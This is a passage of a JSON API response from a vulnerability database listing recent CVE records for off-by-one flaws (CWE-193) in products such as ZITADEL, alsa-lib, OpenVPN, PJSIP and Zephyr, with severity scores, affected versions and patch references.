VE-2026-93018","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-93018","note":"authoritative record"}]},{"id":"57234e44-0884-4221-98f7-18aae27282c1","slug":"cve-2026-76081","externalId":"CVE-2026-76081","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-76081 — ZITADEL is an open source identity management platform.","description":"ZITADEL is an open source identity management platform. Prior to version 4.16.0, a bug in how ZITADEL updates permissions when multiple project roles are deleted at the same time can cause some user permissions to be missed. This issue specifically affects User Grants on Granted Projects (projects shared between different organizations), potentially allowing users to keep access rights that were supposed to be completely removed. This issue has been fully resolved in version 4.16.0. There are no configuration workarounds. Upgrading to a patched version is the only way to trigger the automatic cleanup migration. Those who cannot upgrade immediately should manually review user permissions specifically for Granted Projects where multiple roles were recently deleted.","cveId":"CVE-2026-76081","cvssScore":5.5,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N","severity":"medium","vendor":"Go","product":"github.com/zitadel/zitadel","affectedVersions":["pkg:golang/github.com/zitadel/zitadel < 4.16.0","pkg:golang/github.com/zitadel/zitadel"],"cwes":["CWE-193"],"tags":["nvd","status:received","osv","osv:ghsa-v859-c572-qh5p","ecosystem:go","status:deferred","osv:go-2026-6473"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://github.com/zitadel/zitadel/commit/9d60e83d6faa5e7e7a5339e031cdb26e0efe4d59"],"references":[{"url":"https://github.com/zitadel/zitadel/commit/9d60e83d6faa5e7e7a5339e031cdb26e0efe4d59","type":"patch","title":"OSV fix"},{"url":"https://github.com/zitadel/zitadel/releases/tag/v4.16.0","type":"other","title":"OSV web"},{"url":"https://github.com/zitadel/zitadel/security/advisories/GHSA-v859-c572-qh5p","type":"advisory","title":"OSV advisory"},{"url":"https://osv.dev/vulnerability/GHSA-v859-c572-qh5p","type":"advisory","title":"OSV GHSA-v859-c572-qh5p"},{"url":"https://github.com/zitadel/zitadel","type":"vendor","title":"OSV package"},{"url":"https://osv.dev/vulnerability/GO-2026-6473","type":"advisory","title":"OSV GO-2026-6473"}],"epssScore":0.00397,"epssPercentile":0.31796,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-14T22:16:57.910Z","addedAt":"2026-09-14T23:50:34.761Z","updatedAt":"2026-09-17T19:54:32.665Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-76081","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-76081","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-V859-C572-QH5P"}]},{"id":"4275f2d8-0b82-40e5-995f-937e00b4edea","slug":"cve-2026-90781","externalId":"CVE-2026-90781","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-90781 — alsa-lib through 1.2.16.1 contains a stack buffer overflow in the __snd_ctl_ascii_elem_id_parse() function that writes one byte past a 64-byte buff…","description":"alsa-lib through 1.2.16.1 contains a stack buffer overflow in the __snd_ctl_ascii_elem_id_parse() function that writes one byte past a 64-byte buffer when parsing a name= field with 64 or more characters. Attackers can supply a long control-element identifier string through saved state files or command-line arguments to overwrite adjacent stack memory and crash the calling process.","cveId":"CVE-2026-90781","cvssScore":4.8,"cvssVector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-193"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/alsa-project/alsa-lib","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/alsa-project/alsa-lib/blob/v1.2.16.1/src/control/ctlparse.c#L216-L241","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/alsa-project/alsa-lib/commit/f84cd4ced7b36fddb8e4ee24404cf7c091d27020","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://lore.kernel.org/alsa-devel/CACBQ=P2FhO3M6dkv3cWuKb6Qhs92ouV+FJ3SJZ_PVBSSdJWRAQ@mail.gmail.com/","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/alsa-lib-through-1.2.16.1-off-by-one-stack-buffer-overflow-in-snd-ctl-ascii-elem-id-parse","type":"advisory","title":"disclosure@vulncheck.com"}],"epssScore":0.0017,"epssPercentile":0.0582,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-13T13:16:29.263Z","addedAt":"2026-09-13T13:50:34.188Z","updatedAt":"2026-09-24T21:50:41.839Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-90781","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-90781","note":"authoritative record"}]},{"id":"6fad5a27-2f18-4990-a717-a4eb0e21f1a0","slug":"cve-2026-81396","externalId":"CVE-2026-81396","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-81396 — Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.","description":"Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.","cveId":"CVE-2026-81396","cvssScore":7.8,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","severity":"high","vendor":"microsoft","product":"365 apps","affectedVersions":["2016"],"cwes":["CWE-121","CWE-193"],"tags":["nvd","status:undergoing-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-81396"],"references":[{"url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-81396","type":"patch","title":"Patch"}],"epssScore":0.00466,"epssPercentile":0.3841,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-08T18:20:56.163Z","addedAt":"2026-09-08T19:50:43.057Z","updatedAt":"2026-09-17T21:50:36.407Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-81396","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-81396","note":"authoritative record"}]},{"id":"039ad741-9e58-463a-afc5-9443b068248d","slug":"cve-2026-69609","externalId":"CVE-2026-69609","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-69609 — Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.","description":"Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.","cveId":"CVE-2026-69609","cvssScore":5.5,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","severity":"medium","vendor":"microsoft","product":"windows 10 1607","affectedVersions":["< 10.0.14393.9512","< 10.0.17763.9245","< 10.0.19044.7725","< 10.0.19045.7725","< 10.0.22631.7582","< 10.0.26100.9445","< 10.0.26200.9445","< 10.0.28000.2954","r2","< 10.0.20348.5622","< 10.0.26100.33438"],"cwes":["CWE-125","CWE-193"],"tags":["nvd","status:awaiting-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-69609"],"references":[{"url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-69609","type":"patch","title":"Patch"}],"epssScore":0.00404,"epssPercentile":0.32558,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-08T18:19:32.167Z","addedAt":"2026-09-08T19:50:40.548Z","updatedAt":"2026-09-24T23:50:39.805Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-69609","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-69609","note":"authoritative record"}]},{"id":"a35648f0-de0e-4df5-bcd9-f999039902cf","slug":"cve-2026-86297","externalId":"CVE-2026-86297","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-86297 — A vulnerability was identified in D-Link DIR-605 B1v202WWB03.","description":"A vulnerability was identified in D-Link DIR-605 B1v202WWB03. This issue affects the function tunnel_set_params of the file progs.gpl/pppd.alpha/l2tp/tunnel.c of the component L2TP Control Message Parser. Such manipulation of the argument peer_hostname  leads to off-by-one. The attack may be performed from remote. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit is publicly available and might be used.","cveId":"CVE-2026-86297","cvssScore":8.2,"cvssVector":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-189","CWE-193"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://tzh00203.notion.site/D-Link-DIR-605-L2TP-Host-Name-AVP-Out-of-Bounds-Write-33cb5c52018a809ba163f988c15fc1b7","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-86297","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/906299","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/399459","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/399459/cti","type":"advisory","title":"cna@vuldb.com"},{"url":"https://www.dlink.com/","type":"advisory","title":"cna@vuldb.com"}],"epssScore":0.01124,"epssPercentile":0.65256,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-07T11:17:39.730Z","addedAt":"2026-09-07T11:50:33.239Z","updatedAt":"2026-09-09T15:50:35.985Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-86297","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-86297","note":"authoritative record"}]},{"id":"548f64f8-55c7-43a8-9d44-6612293f5f82","slug":"cve-2026-81738","externalId":"CVE-2026-81738","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-81738 — OpenVPN 2.5.0 through 2.7.6 on Windows using the tap-windows6 driver allows attackers to trigger an out-of-bounds write via crafted DOMAIN-SEARCH e…","description":"OpenVPN 2.5.0 through 2.7.6 on Windows using the tap-windows6 driver allows attackers to trigger an out-of-bounds write via crafted DOMAIN-SEARCH entries","cveId":"CVE-2026-81738","cvssScore":2.3,"cvssVector":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"low","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-121","CWE-193","CWE-787"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://community.openvpn.net/Security%20Announcements/CVE-2026-81738","type":"advisory","title":"security@openvpn.net"}],"epssScore":0.00331,"epssPercentile":0.24192,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-07T08:17:13.270Z","addedAt":"2026-09-07T09:50:33.016Z","updatedAt":"2026-09-08T19:50:37.352Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-81738","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-81738","note":"authoritative record"}]},{"id":"f1efff77-2a49-4c21-8dfc-f54bd4e07380","slug":"cve-2026-57160","externalId":"CVE-2026-57160","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-57160 — PJSIP is a free and open source multimedia communication library written in C.","description":"PJSIP is a free and open source multimedia communication library written in C. Prior to commit d6a0e7f, a buffer overflow can occur in pjsip_generic_array_hdr_print() in pjsip/src/pjsip/sip_msg.c, the function that serializes generic array headers (such as Allow, Require, Supported, and Unsupported). Under certain output-buffer boundary conditions the function can write one byte past the end of the buffer. This is reachable mainly in applications that parse and re-serialize incoming SIP requests — for example a proxy, SBC, or B2BUA — where a remote peer can influence the serialized message. The out-of-bounds write is a single fixed byte; code execution and information disclosure are not demonstrated, and in typical pool-based allocations the byte falls within allocation slack. This issue has been patched via commit d6a0e7f.","cveId":"CVE-2026-57160","cvssScore":6.9,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":"teluu","product":"pjsip","affectedVersions":["<= 2.17"],"cwes":["CWE-193"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://github.com/pjsip/pjproject/commit/d6a0e7f76611c3a6f530ee051e3e7a622bb1748c","https://github.com/pjsip/pjproject/security/advisories/GHSA-277r-3q2j-mxcw"],"references":[{"url":"https://github.com/pjsip/pjproject/commit/d6a0e7f76611c3a6f530ee051e3e7a622bb1748c","type":"patch","title":"Patch"},{"url":"https://github.com/pjsip/pjproject/security/advisories/GHSA-277r-3q2j-mxcw","type":"patch","title":"Patch"}],"epssScore":0.00412,"epssPercentile":0.3338,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-04T18:17:53.740Z","addedAt":"2026-09-04T19:50:33.283Z","updatedAt":"2026-09-11T15:50:33.958Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-57160","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-57160","note":"authoritative record"}]},{"id":"911705ef-6f20-4dd5-9acf-53ed74a55386","slug":"cve-2026-17469","externalId":"CVE-2026-17469","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-17469 — IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local authenticated attacker to cause a denial of service due to an off-by-one write in the LPD queue na…","description":"IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local authenticated attacker to cause a denial of service due to an off-by-one write in the LPD queue name parser.","cveId":"CVE-2026-17469","cvssScore":5.5,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","severity":"medium","vendor":"ibm","product":"i","affectedVersions":["7.3","7.4","7.5","7.6"],"cwes":["CWE-787","CWE-193"],"tags":["nvd","status:received","status:undergoing-analysis","status:analyzed"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":true,"patchLinks":["https://www.ibm.com/support/pages/node/7285939"],"references":[{"url":"https://www.ibm.com/support/pages/node/7285939","type":"patch","title":"Patch"}],"epssScore":0.00207,"epssPercentile":0.09941,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-04T17:16:54.487Z","addedAt":"2026-09-04T17:50:33.300Z","updatedAt":"2026-09-09T17:50:37.118Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-17469","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-17469","note":"authoritative record"}]},{"id":"0a8653fd-678b-4381-8cef-b53f520e42c5","slug":"cve-2026-85454","externalId":"CVE-2026-85454","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-85454 — MOOS core-moos through 10.4.0 contains a buffer overflow vulnerability in CMOOSSerialPort::GetTelegram() that writes a NUL terminator one byte past…","description":"MOOS core-moos through 10.4.0 contains a buffer overflow vulnerability in CMOOSSerialPort::GetTelegram() that writes a NUL terminator one byte past the serial telegram stack buffer. Attackers controlling the serial line can send a full-length telegram to trigger the off-by-one write, corrupting the stack and potentially enabling code execution.","cveId":"CVE-2026-85454","cvssScore":5.2,"cvssVector":"CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-193"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/themoos/core-moos","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/themoos/core-moos/blob/ec9c77c68fcbdef8f5e4c60fe243acd223433f0c/Core/libMOOS/Utils/MOOSSerialPort.cpp#L595","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/themoos/core-moos/commit/befb04df2039d0080715ea35f56268092db4ec0f","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/themoos/core-moos/pull/73","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/moos-core-moos-through-10.4.0-off-by-one-buffer-overflow-in-serial-telegram-handling","type":"advisory","title":"disclosure@vulncheck.com"}],"epssScore":0.00323,"epssPercentile":0.23387,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-03T23:17:25.660Z","addedAt":"2026-09-03T23:50:32.151Z","updatedAt":"2026-09-08T21:50:38.483Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-85454","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-85454","note":"authoritative record"}]},{"id":"a10eaf34-c669-4324-9d5c-0698eade7367","slug":"cve-2026-14368","externalId":"CVE-2026-14368","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-14368 — The LwM2M JSON content formatter's get_string() in subsys/net/lib/lwm2m/lwm2m_rw_json.c copies a parsed JSON string into a caller-supplied buffer a…","description":"The LwM2M JSON content formatter's get_string() in subsys/net/lib/lwm2m/lwm2m_rw_json.c copies a parsed JSON string into a caller-supplied buffer and NUL-terminates it. The length guard used if (string_length > buflen), which accepts a string whose length is exactly buflen. After memcpy() fills the whole buffer, buf[string_length] = '\\0' then writes one byte past the end of the buffer (CWE-787).\n\nThe string value and its length are taken directly from the incoming CoAP payload during a LwM2M WRITE: do_write_op_json() parses the payload obtained from coap_packet_get_payload(), and get_string() is invoked from lwm2m_write_handler() (engine_get_string() in subsys/net/lib/lwm2m/lwm2m_message_handling.c) for a LWM2M_RES_TYPE_STRING resource. The destination buf/buflen is either the resource instance's fixed data buffer (res_inst->data_ptr/max_data_len) or the engine validation buffer (msg->ctx->validate_buf). A LwM2M server (the client's DTLS peer) can therefore write a string resource with a value whose length equals the target buffer size and force a one-byte overflow.\n\nThe overflow is a single out-of-bounds write of the constant byte 0x00 immediately past the resource or validation buffer, corrupting the adjacent byte in memory. It is not an information leak and the written value is fixed, so it is not a direct code-execution primitive, but it can corrupt adjacent state (an adjacent resource value, a length/flag field, or a struct field) and cause data corruption or a crash. Triggering the write is deterministic; the resulting impact depends on memory layout.\n\nThe fix changes the guard to string_length >= buflen, rejecting the exact-length case and aligning the JSON formatter with the other content formatters (lwm2m_rw_plain_text.c, lwm2m_rw_oma_tlv.c, lwm2m_rw_senml_json.c, lwm2m_rw_cbor.c, lwm2m_rw_senml_cbor.c), which already used the correct boundary check.","cveId":"CVE-2026-14368","cvssScore":5.4,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-193","CWE-787"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/zephyrproject-rtos/zephyr/commit/ba38f4b94337cc2c2446277ac181bdb5fec8f2b2","type":"advisory","title":"vulnerabilities@zephyrproject.org"},{"url":"https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-vg53-h6qq-xx7h","type":"advisory","title":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}],"epssScore":0.00227,"epssPercentile":0.12353,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-08-31T19:16:45.887Z","addedAt":"2026-08-31T19:50:35.286Z","updatedAt":"2026-09-01T15:50:34.365Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-14368","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-14368","note":"authoritative record"}]}],"pagination":{"page":1,"limit":20,"total":65,"totalPages":4,"hasNext":true,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-09T01:16:57.010Z","durationMs":95,"filters":{"search":null,"severity":[],"type":[],"country":[],"tag":[],"cwe":["CWE-193"],"vendor":null,"product":null,"cve":null,"source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":[],"warnings":[]}}